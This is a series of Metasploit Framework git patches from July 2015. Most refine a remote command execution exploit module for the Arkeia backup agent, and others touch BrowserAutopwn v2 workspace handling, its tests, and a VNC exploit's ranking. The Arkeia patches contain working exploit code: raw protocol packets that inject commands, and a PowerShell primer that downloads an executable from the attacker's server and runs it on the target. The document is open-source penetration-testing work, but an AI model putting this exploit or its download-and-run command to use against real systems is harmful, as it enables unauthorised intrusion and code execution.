-      req = "\x00\x63\x00\x04\x00\x03\x00\x15\x31\x00\x31\x00\x31\x00\x30\x3a\x31\x2c"
-      req << "\x00" * 11
+    req = "\x00\x63\x00\x04\x00\x03\x00\x15\x31\x00\x31\x00\x31\x00\x30\x3a\x31\x2c"
+    req << "\x00" * 11
 
-      sock.put(req)
+    sock.put(req)
 
-      command_length = '%02x' % command.length
-      command_length = command_length.scan(/../).map { |x| x.hex.chr }.join
+    command_length = '%02x' % command.length
+    command_length = command_length.scan(/../).map { |x| x.hex.chr }.join
 
-      req = "\x00\x64\x00\x04\x00\x04\x00"
-      req << command_length # Maximum length can be 255 bytes (0xFF)
-      req << command # Our command to be executed
-      req << "\x00"
+    req = "\x00\x64\x00\x04\x00\x04\x00"
+    req << command_length # Maximum length can be 255 bytes (0xFF)
+    req << command # Our command to be executed
+    req << "\x00"
 
-      print_status("#{rhost}:#{rport} - Executing payload through ARKFS_EXEC_CMD")
+    print_status("#{rhost}:#{rport} - Executing payload through ARKFS_EXEC_CMD")
 
-      sock.put(req)
+    sock.put(req)
 
-      id = sock.get_once(4)
-      unless id && id.length == 4 && id == "\x00\x63\x00\x04"
-        disconnect
-        fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet identifier")
-      end
+    id = sock.get_once(4)
+    unless id && id.length == 4 && id == "\x00\x63\x00\x04"
+      disconnect
+      fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet identifier")
+    end
 
-      data_length = sock.get_once(4)
+    data_length = sock.get_once(4)
 
-      unless data_length && data_length.length == 4
-        disconnect
-        fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet length")
-      end
+    unless data_length && data_length.length == 4
+      disconnect
+      fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet length")
+    end
 
-      data_length = data_length[2..3].unpack('n')[0]
+    data_length = data_length[2..3].unpack('n')[0]
 
-      data = sock.get_once(data_length)
-      unless data && data.length == data_length
-        disconnect
-        fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet data")
-      end
+    data = sock.get_once(data_length)
+    unless data && data.length == data_length
+      disconnect
+      fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet data")
+    end
 
-      # 1st Packet
+    # 1st Packet
 
-      id = sock.get_once(4)
-      unless id && id.length == 4 && id == "\x00\x68\x00\x04"
-        disconnect
-        fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet identifier")
-      end
+    id = sock.get_once(4)
+    unless id && id.length == 4 && id == "\x00\x68\x00\x04"
+      disconnect
+      fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet identifier")
+    end
 
-      data_length = sock.get_once(4)
+    data_length = sock.get_once(4)
 
-      unless data_length && data_length.length == 4
-        disconnect
-        fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet length")
-      end
+    unless data_length && data_length.length == 4
+      disconnect
+      fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet length")
+    end
 
-      data_length = data_length[2..3].unpack('n')[0]
+    data_length = data_length[2..3].unpack('n')[0]
 
-      data = sock.get_once(data_length)
-      unless data && data.length == data_length
-        disconnect
-        fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet data")
-      end
+    data = sock.get_once(data_length)
+    unless data && data.length == data_length
+      disconnect
+      fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet data")
+    end
 
-      # 2st Packet
+    # 2st Packet
 
-      id = sock.get_once(4)
-      unless id && id.length == 4 && id == "\x00\x68\x00\x04"
-        disconnect
-        fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet identifier")
-      end
+    id = sock.get_once(4)
+    unless id && id.length == 4 && id == "\x00\x68\x00\x04"
+      disconnect
+      fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet identifier")
+    end
 
-      data_length = sock.get_once(4)
+    data_length = sock.get_once(4)
 
-      unless data_length && data_length.length == 4
-        disconnect
-        fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet length")
-      end
+    unless data_length && data_length.length == 4
+      disconnect
+      fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet length")
+    end
 
-      data_length = data_length[2..3].unpack('n')[0]
-
-      data = sock.get_once(data_length)
-      unless data && data.length == data_length
-        disconnect
-        fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet data")
-      end
-
-      # Wait for our payload to be sent, else HTTP server might shutdown too quick
-      select(nil, nil, nil, datastore['HTTP_DELAY'])
+    data_length = data_length[2..3].unpack('n')[0]
 
+    data = sock.get_once(data_length)
+    unless data && data.length == data_length
+      disconnect
+      fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet data")
+    end
   end
 
   def on_request_uri(cli, request)
-    unless @pl
-      print_error("#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!")
-      return
+    print_status("Request: #{request.uri}")
+    if request.uri == get_resource
+      print_status('Sending payload...')
+      send_response(cli, @pl)
+      register_files_for_cleanup("c:\\#{@down_file}.exe")
     end
-    print_status("#{rhost}:#{rport} - Sending the payload to the server...")
-    register_files_for_cleanup("c:\\#{@down_file}.exe")
-    send_response(cli, @pl)
   end
-
 end

From bed3257a3fcb05497bc30b0541d09d0d44b6c9af Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Fri, 10 Jul 2015 12:50:26 -0500
Subject: [PATCH 0707/1013] Change default HTTP_DELAY

---
 modules/exploits/multi/misc/arkeia_agent_exec.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/exploits/multi/misc/arkeia_agent_exec.rb b/modules/exploits/multi/misc/arkeia_agent_exec.rb
index 305517653c..f372cd3faf 100644
--- a/modules/exploits/multi/misc/arkeia_agent_exec.rb
+++ b/modules/exploits/multi/misc/arkeia_agent_exec.rb
@@ -68,7 +68,7 @@ class Metasploit3 < Msf::Exploit::Remote
     register_options(
       [
         Opt::RPORT(617),
-        OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the payload request', 10])
+        OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the payload request', 15])
       ], self.class)
   end
 

From 89aa00cfc482f6326f5ff4c3e24a910a664c357e Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Fri, 10 Jul 2015 13:09:42 -0500
Subject: [PATCH 0708/1013] Check job workspace

---
 lib/msf/core/exploit/browser_autopwnv2.rb | 22 ++++++++++------------
 1 file changed, 10 insertions(+), 12 deletions(-)

diff --git a/lib/msf/core/exploit/browser_autopwnv2.rb b/lib/msf/core/exploit/browser_autopwnv2.rb
index 4b90d7fbf9..92a5689538 100644
--- a/lib/msf/core/exploit/browser_autopwnv2.rb
+++ b/lib/msf/core/exploit/browser_autopwnv2.rb
@@ -140,11 +140,10 @@ module Msf
       xploit.datastore['DisablePayloadHandler'] = true
       xploit.datastore['BrowserProfilePrefix']  = browser_profile_prefix
       xploit.datastore['URIPATH']               = "/#{assign_module_resource}"
+      xploit.datastore['WORKSPACE']             = self.workspace
 
-      # TODO: Pass additional parameters
-      # TODO: Pass WORKSPACE and other options down to the sub module
-      # TODO: Add BAPv2 tracking information (?)
-      # TODO: Change exploit output options?
+      # TODO: Add BAPv2 tracking information (?) - HD
+      # TODO: Change exploit output options?     - HD
     end
 
 
@@ -153,7 +152,7 @@ module Msf
     # @param resource [String] The resource to check.
     # @return [TrueClass] Resource is taken.
     # @return [FalseClass] Resource is not taken.
-    # TODO: Prevent partial prefix match
+    # TODO: Prevent partial prefix match - HD
     def is_resource_taken?(resource)
       taken = false
 
@@ -207,7 +206,7 @@ module Msf
     # @return [Hash] A hash with each module list sorted by disclosure date.
     def sort_date_in_group(bap_groups)
       bap_groups.each_pair do |ranking, module_list|
-        # TODO: Handle wonky dates in local modules better
+        # TODO: Handle wonky dates in local modules better - HD
         bap_groups[ranking] = module_list.sort_by {|m| Date.parse(m.disclosure_date.to_s)}.reverse
       end
     end
@@ -335,14 +334,11 @@ module Msf
         multi_handler.datastore['SessionExpirationTimeout'] = datastore['SessionExpirationTimeout'] if datastore['SessionExpirationTimeout']
         multi_handler.datastore['SessionCommunicationTimeout'] = datastore['SessionCommunicationTimeout'] if datastore['SessionCommunicationTimeout']
 
-
-        # TODO: Pass WORKSPACE and other options down to the sub module
-
         # Configurable only by BAP
         multi_handler.datastore['ExitOnSession'] = false
         multi_handler.datastore['EXITFUNC']      = 'thread'
+        multi_handler.datastore['WORKSPACE']     = self.workspace
 
-        # TODO: BAPv2 specific options / tracking would go here
 
         # Now we're ready to start the handler
         multi_handler.exploit_simple(
@@ -697,11 +693,13 @@ module Msf
     #
     # @return [Fixnum] A session count.
     def session_count
-      # TODO: Restrict these to the active workspace
       total = 0
 
       payload_job_ids.each do |id|
-        total += framework.jobs[id.to_s].ctx.first.session_count
+        job_workspace = framework.jobs[id.to_s].ctx.first.datastore['WORKSPACE']
+        if job_workspace == self.workspace
+          total += framework.jobs[id.to_s].ctx.first.session_count
+        end
       end
 
       total

From c8c3e1a2585f9d842ddccc30475460a38489a463 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Fri, 10 Jul 2015 13:42:25 -0500
Subject: [PATCH 0709/1013] Fix rspec

---
 .../core/exploit/browser_autopwnv2_spec.rb    | 30 ++++++++-----------
 1 file changed, 13 insertions(+), 17 deletions(-)

diff --git a/spec/lib/msf/core/exploit/browser_autopwnv2_spec.rb b/spec/lib/msf/core/exploit/browser_autopwnv2_spec.rb
index 2e811b8696..eadd5f8394 100644
--- a/spec/lib/msf/core/exploit/browser_autopwnv2_spec.rb
+++ b/spec/lib/msf/core/exploit/browser_autopwnv2_spec.rb
@@ -18,7 +18,7 @@ describe Msf::Exploit::Remote::BrowserAutopwnv2 do
     # This empties it
     notes = []
 
-    db = double('db')
+    db = double('db1')
     allow(db).to receive(:notes).and_return(notes)
     allow(framework).to receive(:db).and_return(db)
 
@@ -28,14 +28,14 @@ describe Msf::Exploit::Remote::BrowserAutopwnv2 do
   def mock_report_note(arg)
     framework = double('Msf::Framework', datastore: {})
     notes = [create_fake_note('bap.clicks')]
-    db = double('db')
+    db = double('db2')
     allow(db).to receive(:notes).and_return(notes)
     allow(framework).to receive(:db).and_return(db)
     allow(subject).to receive(:framework).and_return(framework)
   end
 
   def create_fake_note(tag, data='')
-    note = double('note')
+    note = double('note3')
 
     allow(note).to receive(:ntype).and_return(tag)
     allow(note).to receive(:data).and_return(data)
@@ -65,6 +65,7 @@ describe Msf::Exploit::Remote::BrowserAutopwnv2 do
     datastore_options = opts[:datastore_options] || {}
     job_id            = opts[:job_id] || 0
     requirements      = opts[:requirements] || {}
+    workspace         = opts[:workspace] || 'default'
 
     mod = Msf::Exploit.new
     mod.extend(Msf::Exploit::Remote::BrowserExploitServer)
@@ -75,6 +76,7 @@ describe Msf::Exploit::Remote::BrowserAutopwnv2 do
     allow(mod).to receive(:compatible_payloads).and_return(compat_payloads)
     allow(mod).to receive(:datastore).and_return(datastore_options)
     allow(mod).to receive(:job_id).and_return(job_id)
+    allow(mod).to receive(:workspace).and_return(workspace)
     allow(mod).to receive(:exploit_simple)
     allow(mod).to receive(:vprint_status)
     allow(mod).to receive(:shortname).and_return(short_name)
@@ -139,6 +141,7 @@ describe Msf::Exploit::Remote::BrowserAutopwnv2 do
     datastores = opts[:datastore_options]
     fullname   = opts[:fullname]
     shortname  = opts[:shortname]
+    workspace  = opts[:workspace] || 'default'
 
     p = Msf::Payload.new
 
@@ -154,8 +157,11 @@ describe Msf::Exploit::Remote::BrowserAutopwnv2 do
       p.datastore[key] = value
     end
 
+    datastores['WORKSPACE'] = workspace
+
     allow(p).to receive(:fullname).and_return(fullname)
     allow(p).to receive(:shoftname).and_return(shortname)
+    allow(p).to receive(:workspace).and_return(workspace)
 
     p
   end
@@ -329,10 +335,14 @@ describe Msf::Exploit::Remote::BrowserAutopwnv2 do
     notes = [create_fake_note("#{note_type_prefix}.#{profile_tag}", profile_packed_data)]
 
     # Prepare framework.db
+    w = double('workspace')
+    allow(w).to receive(:name).and_return('WORKSPACE')
+
     db = double('db')
     allow(db).to receive(:report_note).with(kind_of(Hash)) { |arg| mock_report_note(arg) }
     allow(db).to receive(:notes).and_return(notes)
     allow(db).to receive(:active).and_return(true)
+    allow(db).to receive(:workspace).and_return(w)
     allow(framework).to receive(:db).and_return(db)
 
     # Prepare framework.exploits
@@ -710,20 +720,6 @@ describe Msf::Exploit::Remote::BrowserAutopwnv2 do
       # You got me, I don't know how to implement this one because the super"
     end
 
-    describe '#show_payloads' do
-      it 'shows payloads' do
-        output = get_stdout { subject.show_payloads }
-        expect(output).to include(windows_meterpreter_reverse_tcp)
-        expect(output).to include(linux_meterpreter_reverse_tcp)
-      end
-    end
-
-    describe '#set_payload' do
-      it 'shows set_payload' do
-        output = get_stdout { subject.set_payload }
-        expect(output).to include('\'set payload\' has been disabled for BrowserAutoPwn')
-      end
-    end
   end
 
   describe '#log_click' do

From 29a497a616bf51640354d8092b4ea27252f8e80f Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Fri, 10 Jul 2015 14:25:57 -0500
Subject: [PATCH 0710/1013] Read header as 6 bytes

---
 .../exploits/multi/misc/arkeia_agent_exec.rb  | 151 +++++++++---------
 1 file changed, 76 insertions(+), 75 deletions(-)

diff --git a/modules/exploits/multi/misc/arkeia_agent_exec.rb b/modules/exploits/multi/misc/arkeia_agent_exec.rb
index f372cd3faf..53119619af 100644
--- a/modules/exploits/multi/misc/arkeia_agent_exec.rb
+++ b/modules/exploits/multi/misc/arkeia_agent_exec.rb
@@ -93,20 +93,20 @@ class Metasploit3 < Msf::Exploit::Remote
 
     sock.put(req)
 
-    id = sock.get_once(4)
-    unless id && id.length == 4 && id == "\x00\x60\x00\x04"
+    header = sock.get_once(6)
+    unless header && header.length == 6 && header[0, 4] == "\x00\x60\x00\x04"
       disconnect
       return Exploit::CheckCode::Unknown
     end
 
-    data_length = sock.get_once(4)
+    data_length = sock.get_once(2)
 
-    unless data_length && data_length.length == 4
+    unless data_length && data_length.length == 2
       disconnect
       return Exploit::CheckCode::Unknown
     end
 
-    data_length = data_length[2..3].unpack('n')[0]
+    data_length = data_length.unpack('n')[0]
 
     data = sock.get_once(data_length)
     unless data && data.length == data_length
@@ -120,20 +120,20 @@ class Metasploit3 < Msf::Exploit::Remote
     req << "\x00" * 11
 
     sock.put(req)
-    id = sock.get_once(4)
-    unless id && id.length == 4 && id == "\x00\x60\x00\x04"
+    header = sock.get_once(6)
+    unless header && header.length == 6 && header[0, 4] == "\x00\x60\x00\x04"
       disconnect
       return Exploit::CheckCode::Unknown
     end
 
-    data_length = sock.get_once(4)
+    data_length = sock.get_once(2)
 
-    unless data_length && data_length.length == 4
+    unless data_length && data_length.length == 2
       disconnect
       return Exploit::CheckCode::Unknown
     end
 
-    data_length = data_length[2..3].unpack('n')[0]
+    data_length = data_length.unpack('n')[0]
 
     data = sock.get_once(data_length)
     unless data && data.length == data_length
@@ -146,20 +146,21 @@ class Metasploit3 < Msf::Exploit::Remote
     req << "\x00" * 11
 
     sock.put(req)
-    id = sock.get_once(4)
-    unless id && id.length == 4 && id == "\x00\x43\x00\x00"
+    header = sock.get_once(6)
+
+    unless header && header.length == 6 && header[0, 4] == "\x00\x43\x00\x00"
       disconnect
       return Exploit::CheckCode::Unknown
     end
 
-    data_length = sock.get_once(4)
+    data_length = sock.get_once(2)
 
-    unless data_length && data_length.length == 4
+    unless data_length && data_length.length == 2
       disconnect
       return Exploit::CheckCode::Unknown
     end
 
-    data_length = data_length[2..3].unpack('n')[0]
+    data_length = data_length.unpack('n')[0]
 
     unless data_length == 0
       disconnect
@@ -176,20 +177,20 @@ class Metasploit3 < Msf::Exploit::Remote
 
     sock.put(req)
 
-    id = sock.get_once(4)
-    unless id && id.length == 4 && id == "\x00\x43\x00\x00"
+    header = sock.get_once(6)
+    unless header && header.length == 6 && header[0, 4] == "\x00\x43\x00\x00"
       disconnect
       return Exploit::CheckCode::Unknown
     end
 
-    data_length = sock.get_once(4)
+    data_length = sock.get_once(2)
 
-    unless data_length && data_length.length == 4
+    unless data_length && data_length.length == 2
       disconnect
       return Exploit::CheckCode::Unknown
     end
 
-    data_length = data_length[2..3].unpack('n')[0]
+    data_length = data_length.unpack('n')[0]
     unless data_length == 0
       disconnect
       return Exploit::CheckCode::Unknown
@@ -202,20 +203,20 @@ class Metasploit3 < Msf::Exploit::Remote
 
     # 1st packet
 
-    id = sock.get_once(4)
-    unless id && id.length == 4 && id == "\x00\x63\x00\x04"
+    header = sock.get_once(6)
+    unless header && header.length == 6 && header[0, 4] == "\x00\x63\x00\x04"
       disconnect
       return Exploit::CheckCode::Unknown
     end
 
-    data_length = sock.get_once(4)
+    data_length = sock.get_once(2)
 
-    unless data_length && data_length.length == 4
+    unless data_length && data_length.length == 2
       disconnect
       return Exploit::CheckCode::Unknown
     end
 
-    data_length = data_length[2..3].unpack('n')[0]
+    data_length = data_length.unpack('n')[0]
 
     data = sock.get_once(data_length)
     unless data && data.length == data_length
@@ -225,20 +226,20 @@ class Metasploit3 < Msf::Exploit::Remote
 
     # 2nd packet
 
-    id = sock.get_once(4)
-    unless id && id.length == 4 && id == "\x00\x68\x00\x04"
+    header = sock.get_once(6)
+    unless header && header.length == 6 && header[0, 4] == "\x00\x68\x00\x04"
       disconnect
       return Exploit::CheckCode::Unknown
     end
 
-    data_length = sock.get_once(4)
+    data_length = sock.get_once(2)
 
-    unless data_length && data_length.length == 4
+    unless data_length && data_length.length == 2
       disconnect
       return Exploit::CheckCode::Unknown
     end
 
-    data_length = data_length[2..3].unpack('n')[0]
+    data_length = data_length.unpack('n')[0]
 
     data = sock.get_once(data_length)
     unless data && data.length == data_length
@@ -248,20 +249,20 @@ class Metasploit3 < Msf::Exploit::Remote
 
     # 3rd packet
 
-    id = sock.get_once(4)
-    unless id && id.length == 4 && id == "\x00\x65\x00\x04"
+    header = sock.get_once(6)
+    unless header && header.length == 6 && header[0, 4] == "\x00\x65\x00\x04"
       disconnect
       return Exploit::CheckCode::Unknown
     end
 
-    data_length = sock.get_once(4)
+    data_length = sock.get_once(2)
 
-    unless data_length && data_length.length == 4
+    unless data_length && data_length.length == 2
       disconnect
       return Exploit::CheckCode::Unknown
     end
 
-    data_length = data_length[2..3].unpack('n')[0]
+    data_length = data_length.unpack('n')[0]
 
     data = sock.get_once(data_length)
     unless data && data.length == data_length && data.include?('You have successfully retrieved client information')
@@ -271,20 +272,20 @@ class Metasploit3 < Msf::Exploit::Remote
 
     # 4th packet
 
-    id = sock.get_once(4)
-    unless id && id.length == 4 && id == "\x00\x69\x00\x04"
+    header = sock.get_once(6)
+    unless header && header.length == 6 && header[0, 4] == "\x00\x69\x00\x04"
       disconnect
       return Exploit::CheckCode::Unknown
     end
 
-    data_length = sock.get_once(4)
+    data_length = sock.get_once(2)
 
-    unless data_length && data_length.length == 4
+    unless data_length && data_length.length == 2
       disconnect
       return Exploit::CheckCode::Unknown
     end
 
-    data_length = data_length[2..3].unpack('n')[0]
+    data_length = data_length.unpack('n')[0]
 
     data = sock.get_once(data_length)
     unless data && data.length == data_length
@@ -356,20 +357,20 @@ class Metasploit3 < Msf::Exploit::Remote
 
     sock.put(req)
 
-    id = sock.get_once(4)
-    unless id && id.length == 4 && id == "\x00\x60\x00\x04"
+    header = sock.get_once(6)
+    unless header && header.length == 6 && header[0, 4] == "\x00\x60\x00\x04"
       disconnect
       fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet identifier")
     end
 
-    data_length = sock.get_once(4)
+    data_length = sock.get_once(2)
 
-    unless data_length && data_length.length == 4
+    unless data_length && data_length.length == 2
       disconnect
       fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet length")
     end
 
-    data_length = data_length[2..3].unpack('n')[0]
+    data_length = data_length.unpack('n')[0]
 
     data = sock.get_once(data_length)
     unless data && data.length == data_length
@@ -381,20 +382,20 @@ class Metasploit3 < Msf::Exploit::Remote
     req << "\x00" * 11
 
     sock.put(req)
-    id = sock.get_once(4)
-    unless id && id.length == 4 && id == "\x00\x60\x00\x04"
+    header = sock.get_once(6)
+    unless header && header.length == 6 && header[0, 4] == "\x00\x60\x00\x04"
       disconnect
       fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet identifier")
     end
 
-    data_length = sock.get_once(4)
+    data_length = sock.get_once(2)
 
-    unless data_length && data_length.length == 4
+    unless data_length && data_length.length == 2
       disconnect
       fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet length")
     end
 
-    data_length = data_length[2..3].unpack('n')[0]
+    data_length = data_length.unpack('n')[0]
 
     data = sock.get_once(data_length)
     unless data && data.length == data_length
@@ -409,20 +410,20 @@ class Metasploit3 < Msf::Exploit::Remote
     req << "\x00" * 11
 
     sock.put(req)
-    id = sock.get_once(4)
-    unless id && id.length == 4 && id == "\x00\x43\x00\x00"
+    header = sock.get_once(6)
+    unless header && header.length == 6 && header[0, 4] == "\x00\x43\x00\x00"
       disconnect
       fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet identifier")
     end
 
-    data_length = sock.get_once(4)
+    data_length = sock.get_once(2)
 
-    unless data_length && data_length.length == 4
+    unless data_length && data_length.length == 2
       disconnect
       fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet length")
     end
 
-    data_length = data_length[2..3].unpack('n')[0]
+    data_length = data_length.unpack('n')[0]
 
     unless data_length == 0
       disconnect
@@ -436,20 +437,20 @@ class Metasploit3 < Msf::Exploit::Remote
 
     sock.put(req)
 
-    id = sock.get_once(4)
-    unless id && id.length == 4 && id == "\x00\x43\x00\x00"
+    header = sock.get_once(6)
+    unless header && header.length == 6 && header[0, 4] == "\x00\x43\x00\x00"
       disconnect
       fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet identifier")
     end
 
-    data_length = sock.get_once(4)
+    data_length = sock.get_once(2)
 
-    unless data_length && data_length.length == 4
+    unless data_length && data_length.length == 2
       disconnect
       fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet length")
     end
 
-    data_length = data_length[2..3].unpack('n')[0]
+    data_length = data_length.unpack('n')[0]
 
     unless data_length == 0
       disconnect
@@ -473,20 +474,20 @@ class Metasploit3 < Msf::Exploit::Remote
 
     sock.put(req)
 
-    id = sock.get_once(4)
-    unless id && id.length == 4 && id == "\x00\x63\x00\x04"
+    header = sock.get_once(6)
+    unless header && header.length == 6 && header[0, 4] == "\x00\x63\x00\x04"
       disconnect
       fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet identifier")
     end
 
-    data_length = sock.get_once(4)
+    data_length = sock.get_once(2)
 
-    unless data_length && data_length.length == 4
+    unless data_length && data_length.length == 2
       disconnect
       fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet length")
     end
 
-    data_length = data_length[2..3].unpack('n')[0]
+    data_length = data_length.unpack('n')[0]
 
     data = sock.get_once(data_length)
     unless data && data.length == data_length
@@ -496,20 +497,20 @@ class Metasploit3 < Msf::Exploit::Remote
 
     # 1st Packet
 
-    id = sock.get_once(4)
-    unless id && id.length == 4 && id == "\x00\x68\x00\x04"
+    header = sock.get_once(6)
+    unless header && header.length == 6 && header[0, 4] == "\x00\x68\x00\x04"
       disconnect
       fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet identifier")
     end
 
-    data_length = sock.get_once(4)
+    data_length = sock.get_once(2)
 
-    unless data_length && data_length.length == 4
+    unless data_length && data_length.length == 2
       disconnect
       fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet length")
     end
 
-    data_length = data_length[2..3].unpack('n')[0]
+    data_length = data_length.unpack('n')[0]
 
     data = sock.get_once(data_length)
     unless data && data.length == data_length
@@ -519,20 +520,20 @@ class Metasploit3 < Msf::Exploit::Remote
 
     # 2st Packet
 
-    id = sock.get_once(4)
-    unless id && id.length == 4 && id == "\x00\x68\x00\x04"
+    header = sock.get_once(6)
+    unless header && header.length == 6 && header[0, 4] == "\x00\x68\x00\x04"
       disconnect
       fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet identifier")
     end
 
-    data_length = sock.get_once(4)
+    data_length = sock.get_once(2)
 
-    unless data_length && data_length.length == 4
+    unless data_length && data_length.length == 2
       disconnect
       fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet length")
     end
 
-    data_length = data_length[2..3].unpack('n')[0]
+    data_length = data_length.unpack('n')[0]
 
     data = sock.get_once(data_length)
     unless data && data.length == data_length

From 95ae7d8cae62700c274ef1e0323b3d9a74ee0f4c Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Fri, 10 Jul 2015 16:24:49 -0500
Subject: [PATCH 0711/1013] Fix length limitation

---
 modules/exploits/multi/misc/arkeia_agent_exec.rb | 7 ++++---
 1 file changed, 4 insertions(+), 3 deletions(-)

diff --git a/modules/exploits/multi/misc/arkeia_agent_exec.rb b/modules/exploits/multi/misc/arkeia_agent_exec.rb
index 53119619af..6e3b180ce9 100644
--- a/modules/exploits/multi/misc/arkeia_agent_exec.rb
+++ b/modules/exploits/multi/misc/arkeia_agent_exec.rb
@@ -53,7 +53,8 @@ class Metasploit3 < Msf::Exploit::Remote
               'Platform' => 'unix',
               'Payload' =>
                 {
-                  'Space'       => 255,
+                  'DisableNops' => true,
+                  'Space'       => 60000,
                   'Compat'      => {
                     'PayloadType' => 'cmd cmd_bash',
                     'RequiredCmd' => 'perl python bash-tcp gawk openssl'
@@ -465,8 +466,8 @@ class Metasploit3 < Msf::Exploit::Remote
     command_length = '%02x' % command.length
     command_length = command_length.scan(/../).map { |x| x.hex.chr }.join
 
-    req = "\x00\x64\x00\x04\x00\x04\x00"
-    req << command_length # Maximum length can be 255 bytes (0xFF)
+    req = "\x00\x64\x00\x04\x00\x04"
+    req << [command.length].pack('n')
     req << command # Our command to be executed
     req << "\x00"
 

From bdd8b56336c8544df0e74a5c943862495cbcddfd Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Fri, 10 Jul 2015 16:28:20 -0500
Subject: [PATCH 0712/1013] fix comment

---
 modules/exploits/multi/misc/arkeia_agent_exec.rb | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/modules/exploits/multi/misc/arkeia_agent_exec.rb b/modules/exploits/multi/misc/arkeia_agent_exec.rb
index 6e3b180ce9..2e470675f7 100644
--- a/modules/exploits/multi/misc/arkeia_agent_exec.rb
+++ b/modules/exploits/multi/misc/arkeia_agent_exec.rb
@@ -327,7 +327,8 @@ class Metasploit3 < Msf::Exploit::Remote
   def primer
     @payload_url = get_uri
 
-    # PowerShell web download. The char replacement is needed because using the "/" character twice (like http://) directly is not possible on Windows agents.
+    # PowerShell web download. The char replacement is needed because using the "/" character twice (like http://)
+    # is not possible on Windows agents.
     command = "PowerShell -Command \"$s=[CHAR][BYTE]47;$b=\\\"#{@payload_url.gsub(/\//, '$($s)')}\\\";"
     command << "(New-Object System.Net.WebClient).DownloadFile($b,'c:/#{@down_file}.exe');"
     command << "(New-Object -com Shell.Application).ShellExecute('c:/#{@down_file}.exe');\""

From 917282a1f11e5732312fbdbd916370454c8a7b8a Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Fri, 10 Jul 2015 17:49:15 -0500
Subject: [PATCH 0713/1013] Fix ranking

---
 modules/exploits/multi/vnc/vnc_keyboard_exec.rb | 5 ++---
 1 file changed, 2 insertions(+), 3 deletions(-)

diff --git a/modules/exploits/multi/vnc/vnc_keyboard_exec.rb b/modules/exploits/multi/vnc/vnc_keyboard_exec.rb
index 6d103d0185..f12c1c2754 100644
--- a/modules/exploits/multi/vnc/vnc_keyboard_exec.rb
+++ b/modules/exploits/multi/vnc/vnc_keyboard_exec.rb
@@ -8,7 +8,7 @@ require 'rex/proto/rfb'
 
 class Metasploit3 < Msf::Exploit::Remote
 
-  Rank = ExcellentRanking
+  Rank = GreatRanking
   include Msf::Exploit::Remote::Tcp
   include Msf::Exploit::CmdStager
   include Msf::Exploit::Powershell
@@ -26,10 +26,9 @@ class Metasploit3 < Msf::Exploit::Remote
       'Privileged'      => false,
       'License'         => MSF_LICENSE,
       'Platform'       => %w{ win unix },
-      'Arch'            => ARCH_X86,
       'Targets'         =>
         [
-          [ 'VNC Windows / Powershell', { 'Platform' => 'win' } ],
+          [ 'VNC Windows / Powershell', { 'Arch' => ARCH_X86, 'Platform' => 'win' } ],
           [ 'VNC Windows / VBScript CMDStager', { 'Platform' => 'win' } ],
           [ 'VNC Linux / Unix', { 'Arch' => ARCH_CMD, 'Platform' => 'unix' } ]
         ],

From 8349a274eab78e2ab08bc78e85604d0c94ff377c Mon Sep 17 00:00:00 2001
From: Brent Cook <bcook@rapid7.com>
Date: Thu, 2 Jul 2015 15:30:58 -0500
Subject: [PATCH 0714/1013] use and include git hash of Framework as part of
 the version

Because we do not always update the version number, multiple releases have
shown version string, which is not useful for helping debug issues, or for
knowing what features are enabled.

This adds the git hash or reads from a file a copy of the git hash (useful for
doing packaged builds without git) so that it is clear the origin of a
particular metasploit-framework version.
---
 Gemfile.lock                                  | 10 +++---
 lib/metasploit/framework/core/version.rb      |  2 +-
 lib/metasploit/framework/version.rb           | 34 +++++++++++++++++--
 lib/msf/core/framework.rb                     |  9 ++---
 lib/msf/ui/console/command_dispatcher/core.rb |  2 +-
 spec/lib/msf/core/framework_spec.rb           |  6 ----
